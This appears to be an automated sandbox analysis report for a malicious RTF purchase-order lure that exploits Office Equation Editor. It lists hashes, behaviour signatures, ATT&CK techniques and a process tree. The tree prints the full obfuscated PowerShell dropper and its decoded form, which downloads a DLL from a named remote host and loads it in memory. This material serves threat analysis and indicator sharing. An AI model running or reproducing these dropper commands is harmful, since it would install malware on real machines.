f4b2683cb85506c0d99935f42241f32053bade36fc7d5d13d3317a690a54e66a

General

Target

PO-4501226855_WJO-001.rtf
Size

119KB
MD5

91ac731fae3c6e874267188c9892cabb
SHA1

ddcc9dc0990575d6a78bff10c8d1b2981ab23809
SHA256

f4b2683cb85506c0d99935f42241f32053bade36fc7d5d13d3317a690a54e66a
SHA512

6f51b81ee27a3a220b430d626ef32fcfb4f0c1f0d2dff903de9b99aa05f2b1f155e757fc1de16ea49a76782274b44de8551062d8c31f24d707771cdb1a3fc037
SSDEEP

1536:uqcdGzSxRkMhejQM6CIaUxohWncjrOfi6TFHn2O0gRT/Iw2MsWEd7UwmrigQ9j+2:uqcR/OIaUXP/YiQF+og5N6

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://cryptersandtools.minhacasa.tv/e/e

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
4	1284	EQNEDT32.EXE
6	1284	EQNEDT32.EXE
8	292	powershell.exe
9	292	powershell.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
1284	EQNEDT32.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2084	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3052	powershell.exe
292	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3052	powershell.exe
Token: SeDebugPrivilege	292	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2084	WINWORD.EXE
2084	WINWORD.EXE

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 1284 wrote to memory of 2148	1284	EQNEDT32.EXE	31
PID 1284 wrote to memory of 2148	1284	EQNEDT32.EXE	31
PID 1284 wrote to memory of 2148	1284	EQNEDT32.EXE	31
PID 1284 wrote to memory of 2148	1284	EQNEDT32.EXE	31
PID 2148 wrote to memory of 3052	2148	WScript.exe	33
PID 2148 wrote to memory of 3052	2148	WScript.exe	33
PID 2148 wrote to memory of 3052	2148	WScript.exe	33
PID 2148 wrote to memory of 3052	2148	WScript.exe	33
PID 3052 wrote to memory of 292	3052	powershell.exe	36
PID 3052 wrote to memory of 292	3052	powershell.exe	36
PID 3052 wrote to memory of 292	3052	powershell.exe	36
PID 3052 wrote to memory of 292	3052	powershell.exe	36
PID 2084 wrote to memory of 2540	2084	WINWORD.EXE	37
PID 2084 wrote to memory of 2540	2084	WINWORD.EXE	37
PID 2084 wrote to memory of 2540	2084	WINWORD.EXE	37
PID 2084 wrote to memory of 2540	2084	WINWORD.EXE	37

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\PO-4501226855_WJO-001.rtf"
1⤵
- Drops file in Windows directory
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2084
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2540

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:1284
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\qcyuixgpl.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2148
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC⁂Hk⁂d⁂Bl⁂Fs⁂XQBd⁂C⁂⁂J⁂BE⁂Ew⁂T⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂K⁂BO⁂GU⁂dw⁂t⁂E8⁂YgBq⁂GU⁂YwB0⁂C⁂⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂p⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂GM⁂cgB5⁂H⁂⁂d⁂Bl⁂HI⁂cwBh⁂G4⁂Z⁂B0⁂G8⁂bwBs⁂HM⁂LgBt⁂Gk⁂bgBo⁂GE⁂YwBh⁂HM⁂YQ⁂u⁂HQ⁂dg⁂v⁂GU⁂LwBl⁂Cc⁂KQ⁂p⁂Ds⁂WwBT⁂Hk⁂cwB0⁂GU⁂bQ⁂u⁂EE⁂c⁂Bw⁂EQ⁂bwBt⁂GE⁂aQBu⁂F0⁂Og⁂6⁂EM⁂dQBy⁂HI⁂ZQBu⁂HQ⁂R⁂Bv⁂G0⁂YQBp⁂G4⁂LgBM⁂G8⁂YQBk⁂Cg⁂J⁂BE⁂Ew⁂T⁂⁂p⁂C4⁂RwBl⁂HQ⁂V⁂B5⁂H⁂⁂ZQ⁂o⁂Cc⁂RgBp⁂GI⁂ZQBy⁂C4⁂S⁂Bv⁂G0⁂ZQ⁂n⁂Ck⁂LgBH⁂GU⁂d⁂BN⁂GU⁂d⁂Bo⁂G8⁂Z⁂⁂o⁂Cc⁂VgBB⁂Ek⁂Jw⁂p⁂C4⁂SQBu⁂HY⁂bwBr⁂GU⁂K⁂⁂k⁂G4⁂dQBs⁂Gw⁂L⁂⁂g⁂Fs⁂bwBi⁂Go⁂ZQBj⁂HQ⁂WwBd⁂F0⁂I⁂⁂o⁂Cc⁂d⁂B4⁂HQ⁂LgBw⁂Gk⁂ZgB6⁂HY⁂YgBu⁂C8⁂NQ⁂1⁂C4⁂OQ⁂0⁂C4⁂M⁂⁂x⁂DE⁂Lg⁂5⁂Dc⁂Lw⁂v⁂Do⁂c⁂B0⁂HQ⁂a⁂⁂n⁂Ck⁂KQ⁂=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3052
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://cryptersandtools.minhacasa.tv/e/e'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.pifzvbn/55.94.011.97//:ptth'))"
      4⤵
      Blocklisted process makes network request
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:292

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Exploitation for Client Execution

1

T1203

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
20KB

MD5
0471db36a7b1584e4de279f7305685b6

SHA1
d01677e364d739576a746ab79b5ea0a31960f36d

SHA256
256545ec0f50f064f487ae12123cf9e1adf56af7a3ccda6497e0e0b09fd520b1

SHA512
2f29c586378d1d01282d18598e5ecbcbe002b17167d326dd44f67a15778177d109fc04a1174d588d7a645eb9a5040b1baa5f2ce400a203faf4832e2cffdd35b9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FT24OQYTYLMV1M0B97VK.temp

Filesize
7KB

MD5
0d3e3b81b9f1453a43728883f9a3f14e

SHA1
bc104fbbe58eb522a5373cc06b6de8d3a830dddf

SHA256
a4dde15ee019a509b56f7fe4876b490d5ca05320bbd619231465ca517b278304

SHA512
c378ef95ae2d43a266b5195ebfe9784ecd6ae4a141fd2e9e6335171c036a6314e48182739f1d3855521a68e5321803e22047942f1dd5d386a12cced7bc52e438

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
0d3e3b81b9f1453a43728883f9a3f14e

SHA1
bc104fbbe58eb522a5373cc06b6de8d3a830dddf

SHA256
a4dde15ee019a509b56f7fe4876b490d5ca05320bbd619231465ca517b278304

SHA512
c378ef95ae2d43a266b5195ebfe9784ecd6ae4a141fd2e9e6335171c036a6314e48182739f1d3855521a68e5321803e22047942f1dd5d386a12cced7bc52e438

Download Submit
C:\Users\Admin\AppData\Roaming\qcyuixgpl.vbs

Filesize
319KB

MD5
26a4ab9379ab2bbc5621fd5fced3edd5

SHA1
9c02ac01064bad8261f9b98d5f9ff975943aa546

SHA256
b5ef5c4b23a239e2657f03d28566367e1ea15a4fe08a38667de891fcf9fcedba

SHA512
4227a21051317cb784a2013d0bcb5d6584a0cc16262a5b81b0136ea870588fbc3488fd32b4dafeca19f81ce1e83dde9bac689f14d463d7137e21de7085b656f6

Download Submit
C:\Users\Admin\AppData\Roaming\qcyuixgpl.vbs

Filesize
319KB

MD5
26a4ab9379ab2bbc5621fd5fced3edd5

SHA1
9c02ac01064bad8261f9b98d5f9ff975943aa546

SHA256
b5ef5c4b23a239e2657f03d28566367e1ea15a4fe08a38667de891fcf9fcedba

SHA512
4227a21051317cb784a2013d0bcb5d6584a0cc16262a5b81b0136ea870588fbc3488fd32b4dafeca19f81ce1e83dde9bac689f14d463d7137e21de7085b656f6

Download Submit
memory/292-90-0x0000000002370000-0x00000000023B0000-memory.dmp

Filesize
256KB

Download
memory/2084-54-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2084-117-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/3052-83-0x00000000025F0000-0x0000000002630000-memory.dmp

Filesize
256KB

Download
memory/3052-84-0x00000000025F0000-0x0000000002630000-memory.dmp

Filesize
256KB

Download
memory/3052-95-0x00000000025F0000-0x0000000002630000-memory.dmp

Filesize
256KB

Download

Analysis

Sharing